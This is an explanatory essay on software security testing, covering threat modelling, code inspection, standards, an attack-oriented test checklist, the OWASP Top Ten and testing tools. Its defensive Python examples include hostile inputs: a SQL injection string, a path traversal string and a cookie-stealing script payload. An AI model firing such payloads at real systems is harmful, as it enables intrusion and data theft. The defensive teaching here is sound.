Functional Testing is a broad topic that the literature on traditional software testing covers in great detail. With the emphasis on software security, functional testing plays an important role; however, it should not provide a false sense of security. Testing cannot demonstrate the absence of problems in software, it can only demonstrate (sometimes) that problems do exist [Dijkstra 76]. Testers can try out only a limited number of test cases, and the software might work correctly for those cases and fail for others. Security-related bugs also differ from traditional bugs. Users do not normally search out software bugs intelligently; an enterprising user may occasionally derive satisfaction from making software break, but if he or she succeeds it affects only that user. Malicious attackers, on the other hand, do intelligently search for vulnerabilities, and if they succeed they cause problems for other users, who may be adversely affected. Compounding the problem, malicious hackers are known to script successful attacks and distribute them [Michael 05].

Risk Based Testing

Whether Risk Based Testing should be regarded as a subset of Functional Testing is largely a matter of opinion, but due to its significant role in secure software development it is discussed separately here.

Threat Risk Modelling is the most important mitigation development in web application security in the last three years [Curphey 04]. Risk-based testing is based on software risks. For example: in many web-based applications, there is a risk of injection attacks, where an attacker fools the server into displaying results of arbitrary SQL queries. A risk-based test might actually try to carry out an injection attack, or at least provide evidence that such an attack is possible. For a more complex example, consider the case where risk analysis determines that there are ambiguous requirements. In this case, testers must determine how the ambiguous requirements might manifest themselves as vulnerabilities. The actual tests are then aimed at probing those vulnerabilities [Michael 05].
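A risk-based injection test of this kind can be sketched with Python's standard sqlite3 module (the table, data and helper names here are invented for illustration): the vulnerable query concatenates user input into the SQL text, while the safe version parameterizes it.

```python
import sqlite3

# In-memory database standing in for the application's backend
# (table and rows are hypothetical).
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT, secret TEXT)")
db.execute("INSERT INTO users VALUES ('alice', 'a-secret'), ('bob', 'b-secret')")

def find_user_vulnerable(name: str):
    # Builds the query by string concatenation -- the flaw under test.
    return db.execute(
        "SELECT name FROM users WHERE name = '" + name + "'").fetchall()

def find_user_safe(name: str):
    # Parameterized query: the driver keeps data out of the SQL grammar.
    return db.execute(
        "SELECT name FROM users WHERE name = ?", (name,)).fetchall()

payload = "' OR '1'='1"               # classic injection input
print(find_user_vulnerable(payload))  # every row comes back: attack possible
print(find_user_safe(payload))        # no rows: the payload is inert data
```

The risk-based test passes when the injection payload returns no rows; against the concatenated query it returns every user, which is exactly the evidence of exploitability the test is after.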

Testability

Security testing is often fundamentally different from traditional testing because it emphasizes what an application should not do rather than what it should do [Fink 97]. There is a far greater emphasis on negative requirements in security testing, for example “the user should not be able to modify the contents of the web page” or “unauthorized users should not be able to access data.” This shift in emphasis from positive to negative requirements affects the way testing is performed: to apply the standard testing approach to negative requirements, one would need to create every possible set of conditions, which is impossible. Many security requirements, such as “an attacker should never be able to take control of the application,” would normally be regarded as un-testable, and testers would ask for the requirements to be refined or dropped. But many security requirements can be neither refined nor dropped even if they are un-testable: one cannot reliably enumerate the ways in which an attacker might take control of a software system, yet the requirement cannot be dropped [Michael 05].

Major Trends

A) Threat Risk Modelling

Threat Risk Modelling is an important tool used to identify highly privileged operations, which can then be thoroughly reviewed for security flaws to ensure they cannot be compromised. Threat modelling is a valuable technique that can be applied to software both during the development process and after software has been built. Microsoft’s Threat Risk Modelling methodology is a pragmatic approach to risk analysis. The idea is to explore the application while thinking like a hacker, which forces testers to explore weaknesses in the architecture and determine whether adequate countermeasures are in place. The testers describe the system and create a list of the assets that make up the entire system. Each asset is assessed for whether it is architecturally significant from a security perspective; that is, does the asset play a role in enforcing the security model? If it does, it is highly likely that you will want to perform a security code inspection on it. Another part of the process is to define trust boundaries, which separate components that implicitly trust each other. By describing these trust boundaries the tester can discover the path of least resistance an attacker may travel, and then develop a list of realistic threats to the system. It quickly becomes obvious whether the system could be compromised by certain common threats. Each threat is then categorized and ranked. Microsoft has developed two schemes for this ranking, STRIDE and DREAD (Business Owners usually develop their own ranking models). STRIDE is a classification scheme standing for Spoofing, Tampering, Repudiation, Information disclosure, Denial of service and Elevation of Privileges. DREAD is a ranking model and an acronym for Damage potential, Reproducibility, Exploitability, Affected users and Discoverability. For each threat, testers decide whether there are adequate countermeasures in place to prevent the attack; any threat without a countermeasure is by definition a vulnerability.
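The DREAD ranking step can be sketched in a few lines of Python (the threat names and scores below are invented for illustration): each threat is scored 1-10 on the five DREAD axes and the threats are ranked by their mean score.

```python
# Hypothetical threats scored 1-10 on each DREAD axis:
# Damage, Reproducibility, Exploitability, Affected users, Discoverability.
threats = {
    "SQL injection in login form":    (8, 10, 7, 10, 9),
    "Verbose stack trace on error":   (3, 10, 9, 4, 10),
    "Session fixation via URL token": (7, 6, 5, 8, 5),
}

def dread_score(scores):
    """One common DREAD ranking: the mean of the five axis scores."""
    return sum(scores) / len(scores)

# Rank threats so the highest-risk items are reviewed first.
ranked = sorted(threats, key=lambda t: dread_score(threats[t]), reverse=True)
for name in ranked:
    print(f"{dread_score(threats[name]):4.1f}  {name}")
```

Averaging the five axes is only one possible scoring rule; as the text notes, organisations often adapt the model to their own weighting.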

B) Code Inspection

Code inspection is a part of the code review process: take the security-significant parts of the system and find both flaws and bugs in the code. Flaws are issues in the code due to poor implementation choices, whereas bugs are issues in code usually due to incorrect semantic constructs, such as buffer overflows. Code inspection involves reviewing source code and looking for common security problems in a systematic manner. But most real-world applications consist of hundreds of thousands of lines of code, and reviewing every line takes an impractical amount of time. This is where threat modelling can help: armed with a prioritized list of assets and threats from a threat-modelling exercise, testers can locate and focus on the relevant source code.

Security code inspection can be automated to some extent. A number of free and commercial tools are available to help in this regard by automated code inspection for a number of common security vulnerabilities. These tools can primarily be classified into static or dynamic analysis tools. The static tools essentially scan the code for unsafe functions and other language constructs. These typically are far more effective with unmanaged languages such as C and C++ where the list of unsafe functions is well documented. Dynamic analysis tool makers claim that their tools compile the source and determine call graphs and dataflow patterns to provide better results than static analysis.

These tools, however, have limited effectiveness. They find low-level faults quickly, but they are not good at finding complex authorization flaws. They are lacking when dealing with managed languages such as Java and C#, which take issues such as buffer overflows out of the equation. Code inspectors do not take exploitability into account, and no one suite fits all; experienced development teams are able to write scripts to automate the scanning for unsafe functions that are unique to a particular application. Manual code review reveals more significant and exploitable issues.
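A team-written scan of the kind mentioned above can be a very small script. The sketch below (the unsafe-function list is illustrative, not complete) flags calls to a few C functions commonly treated as unsafe:

```python
import re

# A few C functions commonly flagged as unsafe (list is illustrative).
UNSAFE = ("strcpy", "strcat", "sprintf", "gets")
PATTERN = re.compile(r"\b(" + "|".join(UNSAFE) + r")\s*\(")

def scan_c_source(source: str):
    """Return (line_number, function) for each unsafe call found."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for match in PATTERN.finditer(line):
            findings.append((lineno, match.group(1)))
    return findings

code = ('int main(void) {\n'
        '    char buf[8];\n'
        '    strcpy(buf, input);\n'
        '    snprintf(buf, 8, "%s", input);\n'
        '}')
print(scan_c_source(code))
```

Note the word boundary in the pattern: snprintf, a bounded replacement, is not mis-flagged as sprintf. This is exactly the class of shallow check the text warns about, as it says nothing about exploitability.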

C) Risk Management Standards/ Methodologies

A number of standards and frameworks are available to determine and manage risk, some of which may be mandatory depending on the country or the nature of the business. By using threat risk modelling under these standards, the result is systems that reduce business risk, and the standards are relatively cheap and effective to apply. The methodologies focus on testing against negative requirements or, in other words, on probing security-related risks.

AS/NZS 4360:2004 Risk Management, an Australian/New Zealand Standard - First issued in 1999, AS/NZS 4360 was the world’s first formal standard for documenting and managing risk, and is still one of the few; it was updated in 2004. Its approach is simple (it is only 28 pages long) and flexible, and does not lock organizations into any particular method of risk management as long as the risk management fulfils the AS/NZS 4360 five steps. It provides several sets of risk tables and allows organizations to adopt their own.

German IT Systems S6.68, a German standard - Covers testing the effectiveness of the management system for the handling of security incidents, together with S6.67, which covers the use of detection measures for security incidents.

ISO 17799-2000 (BS 7799), An International Standards body - This manual fully complies with all of the remote auditing and testing requirements of BS7799 (and its International equivalent ISO 17799) for information security testing.

SET, An American Standards body - This document incorporates the remote auditing test from the SET Secure Electronic Transaction (TM) Compliance Testing Policies and Procedures, Version 4.1, February 22, 2000.

NIST, An American Standards body - This manual has matched compliance through methodology in remote security testing and auditing as per the National Institute of Standards and Technology (NIST) publications. Generally Accepted Principles and Practices for Securing Information Technology systems, http://csrc.nist.gov

CVSS, An American Standards body - The US Department of Homeland Security (DHS) established the NIAC Vulnerability Disclosure Working Group, which incorporates input from Cisco, Symantec, ISS, Qualys, Microsoft, CERT/CC, and eBay. One of the outputs of this group is the Common Vulnerability Scoring System (CVSS).

OWASP, not a standards body but an open Internet organisation - The Open Web Application Security Project (www.owasp.org) is an open community dedicated to finding and fighting the causes of insecure software. All of the OWASP tools, documents, forums, and chapters are free and open to anyone interested in improving application security. OWASP is a new type of entity in the security market: its freedom from commercial pressures allows it to provide unbiased, practical, cost-effective information about application security. OWASP is not affiliated with any technology company, although it supports the informed use of security technology.

ISECOM, Institute for Security and Open Methodologies, not a standards body but an open Internet organisation - Produces the Open Source Security Testing Methodology Manual (OSSTMM), Peter V. Herzog, www.isecom.org. ISECOM is the certification authority for the OSSTMM Professional Security Tester (OPST) and OSSTMM Professional Security Analyst (OPSA) qualifications, www.opst.org - www.opsa.org.

Using Standards, Methodologies or Framework to Secure Software

Testing ensures that the appropriate policy and standards are in place for the development team and that the development team creates metrics and measurement criteria. These concepts should be nothing new to development teams that adopt best practices. Documentation is extremely important: it gives development teams guidelines and policies that they can follow, and people can only do the right thing if they know what the right thing is. If the application is to be developed in Java, it is essential that there is a Java secure-coding standard; if the application is to use cryptography, it is essential that there is a cryptography standard. No policies or standards can cover every situation that the development team will face, but by documenting the common and predictable issues, fewer decisions need to be made during the development process, and security implementation risk is reduced [owasp1].

In theory, development is the implementation of a design. In practice, however, many design decisions are made during code development; these are often smaller decisions that were either too detailed to be described in the design or requirements or, in other cases, issues on which no policy or standards guidance was offered. Using guidelines from risk management standards and methodologies, this is where the software development life cycle process itself is checked to ensure that adequate security is inherent to the process and that a successful testing programme tests people, process and technology.

Example of Methodological testing approach

This Internet application test employs different software-testing techniques to find security bugs in the server/client applications of the system from the Internet. In this module, server/client applications refers to applications developed in-house by the system owners to serve dedicated business purposes; they can be developed with any programming languages and technologies. For example, a web application for business transactions is a target in this module. Black-box and/or white-box testing can be used in this module.

1 Re- Engineering
1.1 Decompose or deconstruct the binary codes, if accessible.
1.2 Determine the protocol specification of the server/client application.
1.3 Guess program logic from the error/debug messages in the application outputs and program behaviours and performance.

2 Authentication
2.1 Find possible brute force password guessing access points in the applications.
2.2 Find valid login credentials with password grinding, if possible.
2.3 Bypass authentication system with spoofed tokens.
2.4 Bypass authentication system with replay authentication information.
2.5 Determine the application logic to maintain the authentication sessions - number of (consecutive) failure logins allowed, login timeout, etc.
2.6 Determine the limitations of access control in the applications - access permissions, login session duration, idle duration.



3 Session Management
3.1 Determine the session management information - number of concurrent sessions, IP based authentication, role-based authentication, identity-based authentication, cookie usage, session ID in URL encoding string, session ID in hidden HTML field variables, etc.
3.2 Guess the session ID sequence and format
3.3 Determine whether the session ID is maintained with IP address information; check if the same session information can be retried and reused on another machine.
3.4 Determine the session management limitations - bandwidth usages, file download/upload limitations, transaction limitations, etc.
3.5 Gather excessive information with direct URL, direct instruction, action sequence jumping and/or pages skipping.
3.6 Gather sensitive information with Man-In-the-Middle attacks.
3.7 Inject excess/bogus information with Session-Hijacking techniques.
3.8 Replay gathered information to fool the applications.
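Step 3.2 above, guessing the session ID sequence, can be illustrated with two hypothetical generators: a sequential one, which an attacker can predict after observing a single ID, and one built on the operating system's CSPRNG via Python's secrets module.

```python
import secrets

class WeakSessions:
    """Sequential session IDs: seeing one ID reveals the next."""
    def __init__(self, start: int = 1000):
        self.counter = start
    def new_id(self) -> str:
        self.counter += 1
        return f"SESS{self.counter}"

class StrongSessions:
    """IDs from a cryptographically secure source (128 random bits)."""
    def new_id(self) -> str:
        return secrets.token_hex(16)

weak = WeakSessions()
observed = weak.new_id()                      # attacker observes 'SESS1001'
predicted = f"SESS{int(observed[4:]) + 1}"    # trivially guess the next one
print(predicted == weak.new_id())             # True: the guess succeeds
```

A tester who can reproduce the next session ID this way has demonstrated a session-hijacking path without touching any other layer of the system.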

4 Input Manipulation
4.1 Find the limitations of the defined variables and protocol payload - data length, data type, construct format, etc.
4.2 Use exceptionally long character strings to find buffer overflow vulnerabilities in the applications.
4.3 Concatenate commands in the input strings of the applications.
4.4 Inject SQL in the input strings of database-tiered web applications.
4.5 Examine "Cross-Site Scripting" in the web applications of the system.
4.6 Examine unauthorized directory/file access with path/directory traversal in the input strings of the applications.
4.7 Use specific URL-encoded strings and/or Unicode-encoded strings to bypass input validation mechanisms of the applications.
4.8 Execute remote commands through "Server Side Include"
4.9 Manipulate the session/persistent cookies to fool or modify the logic in the server-side web applications.
4.10 Manipulate the (hidden) field variable in the HTML forms to fool or modify the logic in the server side web applications.
4.11 Manipulate the "Referrer", "Host", etc. HTTP Protocol variables to fool or modify the logic in the server-side web applications.
4.12 Use illogical/illegal input to test the application error-handling routines and to find useful debug/error messages from the applications.
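Several of the checks above (4.2, 4.4, 4.6) amount to replaying a library of hostile payloads against each input and confirming that every one is rejected. A minimal sketch, with a hypothetical whitelist validator and an illustrative payload sample:

```python
import re

# Hostile payloads of the kinds listed above (long strings, SQL
# metacharacters, path traversal) -- an illustrative sample only.
PAYLOADS = [
    "A" * 10000,          # 4.2: buffer-length probing
    "' OR '1'='1",        # 4.4: SQL injection
    "../../etc/passwd",   # 4.6: path/directory traversal
]

def validate_username(value: str) -> bool:
    """Hypothetical whitelist validator: 1-32 word characters only."""
    return re.fullmatch(r"\w{1,32}", value) is not None

# A crude harness: every hostile payload must be rejected,
# and ordinary input must still be accepted.
results = {p[:20]: validate_username(p) for p in PAYLOADS}
print(results)                        # all values should be False
print(validate_username("alice42"))   # True
```

Real harnesses carry far larger payload libraries, but the shape is the same: the negative requirement ("hostile input is never accepted") is probed payload by payload.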

5 Output Manipulation
5.1 Retrieve valuable information stored in the cookies
5.2 Retrieve valuable information from the client application cache.
5.3 Retrieve valuable information stored in the serialized objects.
5.4 Retrieve valuable information stored in the temporary files and objects

6 Information Leakage
6.1 Find useful information in hidden field variables of the HTML forms and comments in the HTML documents.
6.2 Examine the information contained in the application banners, usage instructions, welcome messages, farewell messages, application help messages, debug/error messages, etc.


D) The Top Ten

Testing for bugs is easy if you know how. That is, an experienced testing team has, as a resource, a knowledge base of common (and not so common) security flaws and knows how to test for them. This knowledge comes with experience but also from research such as the Top Ten web application security vulnerabilities published by the Open Web Application Security Project (OWASP, www.owasp.org), which covers the prevention of common coding vulnerabilities in software development processes. The testing team's own knowledge base, together with resources like this, is an invaluable tool that can be updated as new coding vulnerabilities are discovered.

OWASP Top Ten Most Critical Web Application Security Vulnerabilities http://www.owasp.org/documentation/topten.html

A1 Un-validated Input Information from web requests is not validated before being used by a web application. Attackers can use these flaws to attack backend components through a web application.
A2 Broken Access Control Restrictions on what authenticated users are allowed to do are not properly enforced. Attackers can exploit these flaws to access other users' accounts, view sensitive files, or use unauthorized functions.
A3 Broken Authentication and Session Management Account credentials and session tokens are not properly protected. Attackers that can compromise passwords, keys, session cookies, or other tokens can defeat authentication restrictions and assume other users' identities.
A4 Cross Site Scripting (XSS) Flaws The web application can be used as a mechanism to transport an attack to an end user's browser. A successful attack can disclose the end user's session token, attack the local machine, or spoof content to fool the user.
A5 Buffer Overflows Web application components in some languages that do not properly validate input can be crashed and, in some cases, used to take control of a process. These components can include CGI, libraries, drivers, and web application server components.
A6 Injection Flaws Web applications pass parameters when they access external systems or the local operating system. If an attacker can embed malicious commands in these parameters, the external system may execute those commands on behalf of the web application.
A7 Improper Error Handling Error conditions that occur during normal operation are not handled properly. If an attacker can cause errors to occur that the web application does not handle, they can gain detailed system information, deny service, cause security mechanisms to fail, or crash the server.
A8 Insecure Storage Web applications frequently use cryptographic functions to protect information and credentials. These functions and the code to integrate them have proven difficult to code properly, frequently resulting in weak protection.
A9 Denial of Service Attackers can consume web application resources to a point where other legitimate users can no longer access or use the application. Attackers can also lock users out of their accounts or even cause the entire application to fail.
A10 Insecure Configuration Management Having a strong server configuration standard is critical to a secure web application. These servers have many configuration options that affect security and are not secure out of the box.

Araujo and Curphey [Curphey 06] suggest that, when looking at the security-significant areas of the code base, drafting a simple frame of reference and checklists lets the person auditing the code go about the task in the best possible manner. Inspections allow development teams to leverage the biggest advantage they have over attackers: in-depth knowledge of the design, architecture and source code. Each section of code is reviewed for vulnerabilities and threats that belong to the following eight widely accepted vulnerability categories:

Configuration Management:

As part of this category, consider all issues that stem from insecure configurations and deployment. For instance, it is important to review the web.config file for all ASP.Net applications to check any authentication and/or authorization rules embedded there. Another common configuration flaw to look out for is how the framework and application deal with errors, especially whether detailed error messages are propagated back to the client. Similarly, it is important to ensure that, by default, debug information and debugging are disabled. Other examples of such configuration settings include the validateRequest and EnableViewStateMac directives in ASP.Net. Configuration management checks also include verifying the default permission sets on file system and database-based resources, such as configuration files, log files and database tables.
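Checks like these can be automated. The sketch below parses a web.config-style fragment with Python's standard xml.etree module and flags two of the settings discussed above; the element and attribute names follow the ASP.Net schema, but the sample values and finding messages are invented for illustration.

```python
import xml.etree.ElementTree as ET

# Hypothetical web.config fragment with two unsafe deployment settings.
CONFIG = """
<configuration>
  <system.web>
    <compilation debug="true" />
    <customErrors mode="Off" />
  </system.web>
</configuration>
"""

def audit_config(xml_text: str) -> list[str]:
    """Return a list of findings for unsafe deployment settings."""
    root = ET.fromstring(xml_text)
    findings = []
    comp = root.find("./system.web/compilation")
    if comp is not None and comp.get("debug", "false").lower() == "true":
        findings.append("debug builds enabled in production")
    errors = root.find("./system.web/customErrors")
    if errors is not None and errors.get("mode", "On") == "Off":
        findings.append("detailed errors shown to clients")
    return findings

print(audit_config(CONFIG))
```

Running such a check as part of the deployment pipeline turns a manual configuration review into a repeatable gate.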

Cryptography:

This category deals with protection of data both in storage and in transit. The nature of issues that are covered in this category include whether sensitive information such as social security numbers, user credentials or credit card information is being transmitted in the clear or stored as plaintext in the database. It is also important to ensure that all cryptographic primitives being used are well-known, well-documented and publicly scrutinized algorithms and that key lengths meet industry standards and best practices. For instance, ensure that the developers are using strong algorithms like AES (RSA for public key deployments) with key lengths of 128 bit (2048 bit for asymmetric keys) at a minimum. Similarly, ensure that cryptographically strong sources of randomness are being used to generate keys, session IDs and other such tokens. For instance, the use of the rand/Math.Random to generate an authentication token should be flagged as a flaw because these are easily guessable. Instead, the developers should use classes such as SecureRandom or cryptographic APIs like Microsoft CAPI.
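The contrast between a guessable token source and a cryptographically strong one (the rand/Math.Random versus SecureRandom point above) can be shown with Python's standard random and secrets modules; the function names here are hypothetical.

```python
import random
import secrets

def weak_token() -> str:
    """Mersenne Twister output: fully reproducible if the seed is known."""
    rng = random.Random(1234)   # an attacker who learns the seed wins
    return "".join(rng.choice("0123456789abcdef") for _ in range(32))

def strong_token() -> str:
    """128 bits from the OS CSPRNG: suitable for session tokens and keys."""
    return secrets.token_hex(16)

# The weak generator is fully determined by its seed:
print(weak_token() == weak_token())      # True: identical every call
print(strong_token() == strong_token())  # False (with overwhelming odds)
```

The review rule follows directly: flag any security token derived from a general-purpose PRNG and require a CSPRNG-backed source instead.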
Authentication:

Consider the lack of strong protocols to validate the identity of a user or component as part of this category. Other issues that must be considered include the possibility or potential for authentication attacks such as brute-force or dictionary-based guessing attacks. If account lockouts are implemented, it is important to consider the potential for denial of service, that is, can an attacker lock out accounts permanently and, most importantly, can they lock out the administrative accounts. The quality or the lack of a password policy also must be reviewed for adherence to enterprise or industry requirements and best practices.

Authorization:

The types of issues considered under this category include those dealing with the lack of appropriate mechanisms to enforce access control on protected resources in the system. For instance, can a malicious user elevate his or her privilege by changing an authorization token, or can a business-critical piece of data, such as the price of a product in an e-commerce application, be tampered with by the attacker? One of the most common findings we discover is the so-called “admin token”: a special token or flag that, if passed to the application, causes it to launch the administrative interface, disable all security checks or allow unfettered access in some form. Developers typically introduce these to aid in debugging and either forget to take them out of production systems or assume no one will find them. Authorization flaws typically result in either horizontal or vertical privilege escalation, and they represent the biggest category of problems we find in working with our clients.

Session Management:

This category includes all those issues that deal with how a user’s session is managed within the application. Typical issues to look out for here include determining whether a session token can be replayed to impersonate the user and whether sessions time-out after an extended period of inactivity. Session isolation is also an important consideration. The reviewers must ensure that a user is only provided with information from within his own session and that he cannot intrude into the session of another user. It is also important to ensure that session tokens are random and not guessable.

Data Validation:

This is the category responsible for the most well-known bugs and flaws, including buffer overflows, SQL injection and cross-site scripting. The reviewers must ensure that all data that comes from outside the trust boundary of a component is sanitized and validated. Data sanitization includes type, format, length and range checks. It is especially important to check how the application deals with non-canonicalized data, such as data that is Unicode encoded. The code reviewers should check for use of output validation, which is critical and recommended for dealing with problems such as cross-site scripting. Also, if the application is to be internationalized or localized for a specific language, the impact on regular expression validators and the application in general must be verified. Auditors must scan for any instances of SQL queries being constructed dynamically using string concatenation of parameters obtained from the user, as these represent the most common attack vector for SQL and other injection attacks. It is also important to ensure that any stored procedures being used do not operate in an unsafe manner, for example, that they do not use string parameters and the exec call to execute other stored procedures.
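The output-validation point can be illustrated with Python's standard html module: encoding user data at the point of output renders a script payload inert (the rendering helper below is hypothetical).

```python
import html

def render_comment(user_text: str) -> str:
    """Encode user data before interpolating it into HTML output."""
    return '<p class="comment">' + html.escape(user_text) + "</p>"

hostile = "<script>steal(document.cookie)</script>"
print(render_comment(hostile))
# The payload arrives in the browser as inert text, not executable markup.
```

Output encoding complements, rather than replaces, input validation: the whitelist checks described above narrow what gets in, while encoding guarantees that whatever does get in cannot change the structure of the page.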

Exception Management:

This category is responsible for ensuring that all failure conditions, such as errors and exceptions, are dealt with in a secure manner. The nature of issues covered in this category ranges from detailed error messages, which lead to information disclosure, to how user-friendly security error messages are. For instance, do these messages clearly indicate the security and usability implications of the user's decision, and is the user provided with enough information to make that decision? The code-reviewing team must ensure that exception handlers wrap all security-significant operations, such as database operations and cryptography. The reviewers also must ensure that page- and application-level exception handlers are set.

Auditing and Logging:

The final category of issues discovered during code inspection is concerned with how information is logged for debugging and auditing purposes. For instance, are all security-sensitive operations being logged to create an audit trail? This includes, but is not restricted to, failed and successful logons, impersonation, privilege elevation, change of log settings or clearing of the log, cryptographic operations and session lifetime events. The review team also must ensure that log files cannot be modified, deleted or cleared by unauthorized users. Another common issue we find is too much information being logged, leading to sensitive information disclosure. It is important to verify that the logging capabilities cannot be used in a resource-exhaustion attack on the server through excessive logging without any form of quotas or log-archiving policies. Finally, especially when logs can be viewed by administrators within the same application, the team must ensure that no cross-site scripting tags can be inserted into the log files.

The code-inspection team may choose to review each section of code for all the categories above or, alternatively, apply each category to the entire code base. In our experience, the latter tends to be more effective with larger code bases in which the code-review team is not aiming for 100% code coverage; for smaller projects in which the team will review every line of code, the former is usually more effective and efficient. Once the code-inspection process has been completed and the findings documented, it is important to consider how to deal with the resulting issues. At this stage it is important to be strategic rather than tactical: if possible, patch solutions must be avoided, and the findings must be reviewed to determine their root causes.
If the team finds that the majority of the issues arise because developers are not adhering to best practices and policies, then chances are they have not been made adequately aware of these and must be better informed. Similarly, if a majority of the flaws are related to authorization, then training in role-based access control or other authorization best practices might be in order. We find that patch solutions tend to deal with specific issues and thus either lead to further problems or fail to fix the core issue, which can then be exploited through a different attack vector.

E) Good Programming Techniques

Programmers share information about programming techniques and best practice. These techniques are informally peer reviewed within user groups, at seminars and on the Internet. With security in mind, the appendices describe two such techniques: how to avoid SQL injection attacks (Appendix 1) and good .NET application programming (Appendix 2). An overview of SQL injection is given here:

By the late 1990s, new threats were emerging that began to leverage the power and complexity of new Internet applications. Organizations added more and more functionality to their Web sites, increasing the complexity of information systems connected to the Internet. Hackers moved beyond the traditional methods of attacking operating systems and began attacking the applications themselves. Script kiddies had a rich selection of tools at their disposal that could find and exploit a growing number of vulnerabilities on any device or application connected to the Internet. The attacks on applications came in many forms. One was the SQL-injection attack, in which an individual would insert portions of SQL statements into Web forms in the hope of tricking the application into yielding some otherwise hidden information or performing some forbidden function. [Gregory 03]

(Fig 4)

This screen shot shows the values a hacker might enter into a form to try to get at hidden information or perform a forbidden function. These new kinds of attacks posed a difficult challenge for IT managers in the '90s, for they had few defences available. Firewalls were not designed to decode, understand and make pass-or-fail decisions about the content deep inside network packets. Intrusion detection systems could recognize some of these attacks, but since they were merely monitoring devices, they were powerless to stop them. SQL injection can occur with every form of database access; however, some forms of SQL injection are harder to prevent than others.

F) Password Cracking

Password cracking programs can be used to identify weak passwords, verifying that users are employing sufficiently strong ones. However, since there are so many possibilities, it can take months to crack a password; theoretically, all passwords are "crackable" by a brute-force attack given enough time and processing power. Penetration testers and attackers often have multiple machines across which they can spread the task of cracking passwords, and multiple processors greatly shorten the length of time required to crack strong passwords. The following actions can be taken if an unacceptably high number of passwords can be cracked:

If the cracked passwords were selected according to policy, the policy should be modified to reduce the percentage of crackable passwords. If such policy modification would lead to users writing down their passwords because they are difficult to memorize, an organization should consider replacing password authentication with another form of authentication.

If the cracked passwords were not selected according to policy, the users should be educated on the possible impacts of weak password selections. If such violations by the same users are persistent, management should consider additional steps (additional training, password-management software to enforce better choices, denying access, etc.) to gain user compliance. Many server platforms also allow the system administrator to set a minimum password length and complexity.
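A minimal sketch of the kind of server-side length-and-complexity check mentioned above (the thresholds and function name here are illustrative, not prescriptive):

```python
import re

def meets_policy(password, min_length=8):
    """Reject passwords shorter than min_length or missing an
    upper-case letter, a lower-case letter or a digit."""
    if len(password) < min_length:
        return False
    return all(re.search(p, password)
               for p in (r"[A-Z]", r"[a-z]", r"[0-9]"))
```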

G) Social Engineering

Social engineering is the technique of using persuasion and/or deception to gain access to, or information about, information systems. It is typically implemented through human conversation or other interaction. The usual medium of choice is the telephone, but it can also be e-mail or even face-to-face interaction. Social engineering generally follows two standard approaches. In the first, the penetration tester poses as a user experiencing difficulty and calls the organization's help desk in order to gain information on the target network or host, obtain a login ID and credentials, or get a password reset. The second approach is to pose as the help desk and call a user in order to get the user to provide his or her user ID(s) and password(s). This technique can be extremely effective.

A related principle is psychological acceptability: users should understand the necessity of security, which can be taught through training and education. In addition, the security mechanisms in place should present users with sensible options that give them the usability they require on a daily basis. If users find the security mechanisms too cumbersome, they find ways to work around or compromise them. An example of this is using random passwords that are very strong but difficult to remember; users may write them down or look for methods to circumvent the policy.

Who are the Contributors?

A) The Institute for Security and Open Methodologies (ISECOM) produces the Open Source Security Testing Methodology Manual (OSSTMM). Tests performed in accordance with the Open Source Security Testing Methodology, available at http://www.osstmm.org/, thereby stand within best practices of security testing. The objective of this manual is to create one accepted method for performing a thorough security test. Details such as the credentials of the security tester, the size of the security firm, financing, or vendor backing will impact the scale and complexity of a test, but any network or security expert who meets the outline requirements in this manual will have completed a successful security profile. You will find no recommendation to follow the methodology like a flowchart; it is a series of steps that must be visited and revisited (often) during the making of a thorough test. The methodology chart provided is the optimal way of addressing this with pairs of testers; however, any number of testers are able to follow the methodology in tandem. What is most important in this methodology is that the various tests are assessed and performed where applicable until the expected results are met within a given time frame.

B) Open Web Application Security Project (OWASP) (www.owasp.org) consists of:
The Guide – a document that provides detailed guidance on web application security.
Top Ten Most Critical Web Application Vulnerabilities – a high-level document to help focus on the most critical issues.
Metrics – a project to define workable web application security metrics.
Legal – a project to help software buyers and sellers negotiate appropriate security in their contracts.
Testing Guide – a guide focused on effective web application security testing.
ISO17799 – supporting documents for organizations performing ISO17799 reviews.
AppSec FAQ – frequently asked questions and answers about application security.

C) NGS (Next Generation Security) Software Ltd (www.ngssoftware.com), a computer security provider whose researchers carry out enterprise-level application vulnerability research and database security work.

D) Secure Software, Inc. (http://www.securesoftware.com/) identifies, assesses and corrects software vulnerabilities throughout the development life cycle, offering visibility into overall project performance and policy compliance, with detailed information about the security vulnerabilities affecting the programs developers are responsible for.

E) Foundstone (www.foundstone.com), a division of McAfee, demonstrates vulnerability management solutions and regulatory compliance templates to satisfy government and industry regulations and to prepare for compliance audits. Foundstone also produces the S3i .NET Security Toolkit.

F) Computer Associates International, Inc. (http://www.ca.com), producers of security management software that enables security control through policy-based management and unifies compliance and change-management processes.


Tools

OWASP - The following four tools come from OWASP (www.owasp.org):

WebScarab – a web application vulnerability assessment suite, including proxy tools.
Validation Filters (Stinger for J2EE, filters for PHP) – generic security boundary filters that developers can use in their own applications.
WebGoat – an interactive training and benchmarking tool with which users can learn about web application security in a safe and legal environment.
DotNet – a variety of tools for securing .NET environments.


Foundstone - Foundstone produces a free tool, .NETMon, which is also part of the larger commercial Foundstone S3i .NET Security Toolkit. It watches the .NET Common Language Runtime (CLR) and observes how security is enforced by the .NET Framework for bespoke code. This tool is one of many developed at Foundstone to help code-review teams and software security professionals. It is a code profiler for .NET applications, including those that use ASP.NET: it can check what calls are being made to the System.Security namespace and whether access-control checks are made before any access is allowed to a protected resource. This is useful in finding blind spots and backdoors where authorization checks may be bypassed.

Secure Software's CodeAssure 2.0 secures software development, aiming to provide a comprehensive, process-oriented method of identifying, assessing and correcting software vulnerabilities throughout the development life cycle. CodeAssure 2.0 introduces the CodeAssure Management Center, which offers enterprise-wide visibility into overall project performance and policy compliance. "CodeAssure Management Center provides developers — and their managers — with detailed information about security vulnerabilities that affect the programs they’re responsible for and can highlight security problems that can delay acceptance and deployment of code in production environments," says Dale Gardner, director of product management. As software projects are analyzed, CodeAssure Management Center gathers results. Developers or their managers can then select from a variety of pre-defined reports, offering varying levels of detail and addressing the different information needs of individuals throughout the organization, to understand the current security status of an application and how it has changed over time. CodeAssure 2.0 uses sophisticated static analysis technologies and a comprehensive knowledgebase of security defects to automatically highlight insecure code and manage remediation during the development process.

